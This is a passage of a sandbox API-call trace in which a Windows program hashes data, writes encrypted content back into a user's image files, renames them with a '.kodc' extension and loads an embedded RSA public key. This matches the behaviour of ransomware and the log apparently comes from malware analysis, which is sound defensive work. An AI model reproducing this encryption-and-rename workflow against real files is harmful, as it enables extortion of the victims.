phProv=0x9e2fa50*=0x6932f0) returned 1 [0099.378] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0099.378] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.379] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0099.379] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0099.379] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0099.379] GetLastError () returned 0x0 [0099.379] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0099.379] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0099.379] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.379] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0099.379] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0099.379] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.379] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0099.379] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.379] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.379] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xee40) returned 0x9ba6d90 [0099.379] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.379] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.379] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0099.379] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.379] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0099.379] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0099.379] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9b9b0 [0099.379] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ae50 [0099.379] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9b9f8 [0099.379] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ae68 [0099.379] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ae98 [0099.380] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0099.380] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aeb0 [0099.380] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0099.380] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0099.380] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0099.380] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0099.380] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ae98 | out: hHeap=0x630000) returned 1 [0099.380] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aeb0 | out: hHeap=0x630000) returned 1 [0099.380] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0099.380] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0099.380] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.380] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0099.380] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0099.380] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331aeb0 [0099.380] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0099.380] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331ae98 [0099.380] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0099.380] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0099.380] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.380] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0099.380] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0099.380] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0099.380] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0099.380] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.380] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0099.380] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aeb0 | out: hHeap=0x630000) returned 1 [0099.380] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.380] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ae98 | out: hHeap=0x630000) returned 1 [0099.380] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0099.380] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.381] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0099.381] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0099.381] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0099.381] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.381] GetCurrentThreadId () returned 0x42c [0099.381] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0099.381] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba52b8 [0099.381] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0099.381] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0099.381] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0099.381] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.381] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.381] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0099.381] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.381] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.381] GetCurrentThreadId () returned 0x42c [0099.381] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.381] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.381] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0099.381] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.381] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.381] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.381] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.381] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0099.381] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0099.381] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.381] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0099.381] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.381] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0099.381] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.381] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0099.381] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.381] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.381] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0099.381] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0099.381] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0099.382] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.382] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0099.382] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.382] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ae98 [0099.382] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0099.382] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0099.382] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.382] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.382] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0099.382] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0099.382] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0099.382] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aeb0 [0099.382] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0099.382] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0099.382] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0099.382] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ae80 [0099.382] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0099.382] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0099.382] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.382] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0099.382] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.382] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0099.382] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0099.382] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331aec8 [0099.382] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0099.382] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a5b0 [0099.385] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0099.385] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0099.385] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.385] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0099.385] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0099.385] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0099.385] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ae98 | out: hHeap=0x630000) returned 1 [0099.385] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ae98 [0099.385] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0099.385] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0099.385] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0099.385] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0099.385] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0099.385] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0099.385] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0099.385] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c658 [0099.385] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.385] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0099.385] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ae98 | out: hHeap=0x630000) returned 1 [0099.385] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x6948b0 [0099.385] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0099.385] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0099.385] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.386] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0099.386] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0099.386] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0099.386] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0099.386] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0099.386] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.386] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6948b0 | out: hHeap=0x630000) returned 1 [0099.386] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0099.386] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.386] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aec8 | out: hHeap=0x630000) returned 1 [0099.386] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.386] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0099.386] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0099.386] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aeb0 | out: hHeap=0x630000) returned 1 [0099.386] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ae80 | out: hHeap=0x630000) returned 1 [0099.386] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0099.386] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0099.386] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0099.386] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ae68 | out: hHeap=0x630000) returned 1 [0099.386] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9b9f8 | out: hHeap=0x630000) returned 1 [0099.386] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0099.386] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0099.386] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.386] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0099.386] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0099.386] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.386] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0099.386] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0099.386] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.386] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.386] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0099.386] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba6d90*, nNumberOfBytesToWrite=0xee3b, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba6d90*, lpNumberOfBytesWritten=0x9e2fb14*=0xee3b, lpOverlapped=0x0) returned 1 [0099.387] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba6d90 | out: hHeap=0x630000) returned 1 [0099.387] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xee40, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.387] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0099.387] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0099.387] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0099.387] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0099.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0099.387] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0099.387] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0099.387] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0099.387] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0099.387] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.387] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.387] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0099.388] CloseHandle (hObject=0x5cc) returned 1 [0099.392] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2cb0 [0099.392] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x32d0db8 [0099.393] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c2cb0 | out: hHeap=0x630000) returned 1 [0099.393] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AFUgSZtz3g.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\afugsztz3g.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AFUgSZtz3g.jpg.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\afugsztz3g.jpg.kodc")) returned 1 [0099.393] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0099.393] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.393] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.394] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0099.394] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95cb6900, ftCreationTime.dwHighDateTime=0x1d5b65c, ftLastAccessTime.dwLowDateTime=0xa9524b00, ftLastAccessTime.dwHighDateTime=0x1d5c2a6, ftLastWriteTime.dwLowDateTime=0xa9524b00, ftLastWriteTime.dwHighDateTime=0x1d5c2a6, nFileSizeHigh=0x0, nFileSizeLow=0xdb27, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bigTpE.jpg", cAlternateFileName="")) returned 1 [0099.394] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0099.395] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0099.395] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.395] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bigTpE.jpg") returned=".jpg" [0099.395] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bigTpE.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bigtpe.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0099.395] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=56103) returned 1 [0099.395] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0099.398] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xdb01, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.398] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0099.399] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.399] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0099.399] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.399] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xdb27, lpOverlapped=0x0) returned 1 [0099.399] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.399] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0099.399] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.399] lstrlenA 